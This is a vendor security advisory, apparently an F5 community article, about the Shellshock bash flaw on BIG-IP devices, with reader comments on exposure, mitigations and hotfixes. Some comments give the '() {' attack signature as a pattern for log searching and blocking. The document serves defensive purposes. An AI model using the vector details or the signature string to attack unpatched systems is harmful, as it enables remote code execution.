Technical Articles
F5 SMEs share good practice.
cancel
Showing results for 
Search instead for 
Did you mean: 
Jeff_Costlow_10
Historic F5 Account

It's a good thing we are naming all of our vulnerabilities now; it's easier to keep track of them. I haven't seen an official designation for CVE-2014-6271, but Shellshock seems appropriate.

This new vulnerability may allow a remote attacker to execute instructions on your computer using a feature of the bash shell. A shell is a command line user interface with complicated features akin to programming languages. One feature of bash is to take user input from its environment. Unfortunately this environment can contain executable commands and in some cases can be manipulated by a remote user.

F5 has confirmed that BIG-IP's web GUI is vulnerable to an authenticated user. We currently know of no unauthenticated exploits, either against the management interface or against the traffic interfaces.

We can enumerate through RedHat's security blog's list -- not a comprehensive list -- to look at some ways a BIG-IP could be exploited.
    •    BIG-IP does not use ForceCommand in sshd_config, so users cannot bypass ForceCommand.
    •    BIG-IP does not contain any bash CGI programs, although it is possible that some CGI programs spawn subshells.
    •    BIG-IP does contain mod_php, but the scripts are not vulnerable.
    •    BIG-IP does contain DHCP dhclient and is in theory vulnerable to a malicious DHCP server. This is the only known unauthenticated remotely exploitable vector at this time and is only vulnerable on the management interface. You may disable DHCP on the System::Platform page.
    •    BIG-IP limits the use of bash to authenticated Administrator level accounts. Non-Administrators only have access to tmsh and do not have access to bash.

We still do not believe the traffic passing interfaces of a BIG-IP can be exploited. Please protect your management interface and ensure that it is not exposed to the internet.

F5 will be patching CVE-2014-6271 on all BIG-IP releases. Sol15629 has been published.

Update: BIG-IP iRule mitigation has been posted. F5 LineRate has posted their mitigation. ASM has signature updates.

Comments
daniel_spillers
Nimbostratus
Nimbostratus
"At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." Do you mean that traffic passing interfaces can't be used to attack the BIG-IP appliance itself? Or do you mean the traffic passing interfaces won't pass attacks to back-end servers?
Emad
Cirrostratus
Cirrostratus
And What about ASM? Is F5 Planning to release any signature for it.?
John_Alam_45640
Historic F5 Account
Daniel: This article refers to the security of the BigIP platform itself. The F5 ASM can block such attacks on backend applications when the proper signature is available. This signature can come from F5 or can be user specified. Another option is an iRule. Check this iRule: https://devcentral.f5.com/s/feed/0D51T00006j49ZqSAI
Simon_Waters_13
Cirrostratus
Cirrostratus
Can you confirm the User-Agent injection in the management interface? https://twitter.com/ashk4n/status/515121090688196609
Jeff_Costlow_10
Historic F5 Account
We can confirm that the management GUI is vulnerable to an authenticated user. We will be patching this issue as soon as possible. "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited." The attack will be passed to back end severs. We do not believe that the attack could exploit a BIG-IP directly through the traffic interfaces.
pmilot
Nimbostratus
Nimbostratus
Jeff, You say "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited."; Does this apply to the APM module as well given that those provide web services and serve web content through it's service interface ?
Simon_Waters_13
Cirrostratus
Cirrostratus
Mitigation link giving Server Error?
Simon_Waters_13
Cirrostratus
Cirrostratus
Thanks. In the twitter link they claim that apache is in shadow group, this is not apparently the case on my F5 device. Can you provide clarity there too? Are these permissions some devices, all devices, is it revealed in /etc/group or somewhere else? Not that I want them running commands as apache, but I want to understand fully what I'm reading. Happy to take it to support ticket (already open) if you don't want to discuss here.
Sam_Pickles_110
Nimbostratus
Nimbostratus
Johny, a custom signature may be used in ASM to block Shellshock: https://auraredeye.zendesk.com/entries/56168065-Shellshock-CVE-2014-6271-Mitigation-Custom-ASM-signature This has been working well for us in production so far; we've blocked a lot of attempts particularly over the past 24 hours.
Network_Operat2
Nimbostratus
Nimbostratus
1) What about APM, used to check user certificates before passing the traffic on? That process is hosted by the F5 directly, and is exposed to anonymous users. 2) To all: ... check your www logs for this string: () { - saw lots of attempts to install wow1 last night. If your F5 hosted server is at Bash enabled and unpatched... it may be already owned.
nmolwantwa_8071
Nimbostratus
Nimbostratus
Hi Guys, Thanks all for all your posts and experiences on this issue thus far. Drawback question: What are these "*() {*;*}*" patterns or rather what makes you search for them? I've since checked the TCL site for a clue - but not quite there yet ;( https://www.tcl.tk/man/tcl8.4/TclCmd/string.htmM34 Are these REs? Anyone? Most (if not all) of my backend servers are windows, but still I'd rather use this to see what I get. So Im excited about this post really. Cheers
Rich101
Nimbostratus
Nimbostratus
In reference to "At this point, we do not believe the traffic passing interfaces of a BIG-IP can be exploited. The attack will be passed to back end severs. We do not believe that the attack could exploit a BIG-IP directly through the traffic interfaces." What is the situation with an iRule which performs a http redirect, or some other http response to a user request. Would this not also be vulnerable in the same way that a normal web server is?
hmb104_165567
Nimbostratus
Nimbostratus
When do we expect a path for our systems?!
Can you confirm how it is vulnerable to an authenticated user? I could not find any bash CGI scripts on our system.
Adrian_P
Nimbostratus
Nimbostratus
Is the APM Logon page object in the Access Policy vulnerable to this attack?
Alan_Renicor_10
Altocumulus
Altocumulus
Just seen that hotfix for 11.6 has now been uploaded and the solution article updated to reflect the new hotfix.
Nathan_Bultman_
Historic F5 Account
Hotfix-BIGIP-11.5.1.5.0.147-HF5 has been released to address these CVEs. It is available at http://downloads.f5.com SOL15629 will be republished to reflect this hotfix release shortly.
kwkyiu_53019
Nimbostratus
Nimbostratus
If the web GUI is vulnerable to an authenticated user, is it possible to reduce the exposure by disabling all user (except root/admin)?
yamamoto
Nimbostratus
Nimbostratus
Hello. I have a question in the following description. > BIG-IP does not contain any bash CGI programs, although it is possible that some CGI programs spawn subshells. What is the "subshells" ? I would like to know details of these shell.
kwkyiu_53019
Nimbostratus
Nimbostratus
@yamamoto For example, let's assume that those CGI programs are implemented by Perl. But it is possible that they will call shell script inside those CGI programs.
kwkyiu_53019
Nimbostratus
Nimbostratus
It seems that 10.2.4 HF9 is not compatible with partition formatted disk...We failed to install it on our system. [abc@bigip1:Active] log lvscan [abc@bigip1:Active] log [abc@bigip1:Active] log mount /dev/hdc5 on / type ext3 (rw,noatime) none on /proc type proc (rw) devpts on /dev/pts type devpts (rw) /dev/hdc7 on /config type ext3 (rw,noatime) /dev/hdc9 on /usr type ext3 (ro,noatime) /dev/hdc8 on /var type ext3 (rw,noexec,noatime) /dev/hdc1 on /shared type ext3 (rw,noatime) /shared/.LoopbackLogFS on /var/log type ext3 (rw,loop=/dev/loop0) none on /dev/shm type tmpfs (rw,noatime) none on /var/tmstat type tmpfs (rw) none on /var/run type tmpfs (rw,noatime) prompt on /var/prompt type tmpfs (rw,size=4m) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) none on /dev/mprov/tmm type hugetlbfs (rw) [abc@bigip1:Active] log [abc@bigip1:Active] log cat liveinstall.log *** Live install starting at 2014/10/25 17:46:27 *** info: Daemon-driven execution indicated by ENV variable. debug: /usr/sbin/image2disk: args=--verbose --hotfix --instslot=HD1.2 /shared/images/Hotfix-BIGIP-10.2.4-855.0-HF9.iso debug: caching /shared/images/Hotfix-BIGIP-10.2.4-855.0-HF9.iso to /var/tmp/oWwMgUxTE8. debug: copy failed (/var/tmp/oWwMgUxTE8/EUD/metadata.pl): No such file or directory debug: copy failed (/var/tmp/oWwMgUxTE8/isolinux/install/perl-RPM2.rpm): No such file or directory info: Repository tm_install version/release is 2.8.5.1/2.0 info: System tm_install version/release is 2.7.3/19.0 info: Updating system tm_install files from /shared/images/Hotfix-BIGIP-10.2.4-855.0-HF9.iso .............................................................................. 7393 blocks info: Installer on image is newer, reexec warning: tm_install::DosPtable::scan_table -- identification of /dev/hda5 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hda6 failed; ID is 82 warning: tm_install::DosPtable::scan_table -- identification of /dev/hda7 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hda8 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hda9 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc5 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc6 failed; ID is 82 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc7 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc8 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc9 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc10 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc11 failed; ID is 82 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc12 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc13 failed; ID is 83 warning: tm_install::DosPtable::scan_table -- identification of /dev/hdc14 failed; ID is 83 Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 286. Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 293. Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 294. Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 299. Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 302. Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 305. Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 308. Use of uninitialized value in hash element at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 286. Use of uninitialized value in concatenation (.) or string at /var/tmp/install/pkgcpio/usr/local/lib/tm_install/BootLoader.pm line 287. error: Multiple entries for info: Expert mode enabled for non-TMOS context. debug: /var/tmp/install/pkgcpio/usr/sbin/image2disk: args=--reexec --verbose --hotfix --instslot=HD1.2 /shared/images/Hotfix-BIGIP-10.2.4-855.0-HF9.iso info: Running updated installer. info: Platform id is C62a Terminal error: Can't find requested disk HD1. *** Live install complete at 2014/10/25 17:47:11: status=65280 *** [abc@bigip1:Active] log
Version history
Last update:
‎24-Sep-2014 20:38
Updated by:
Contributors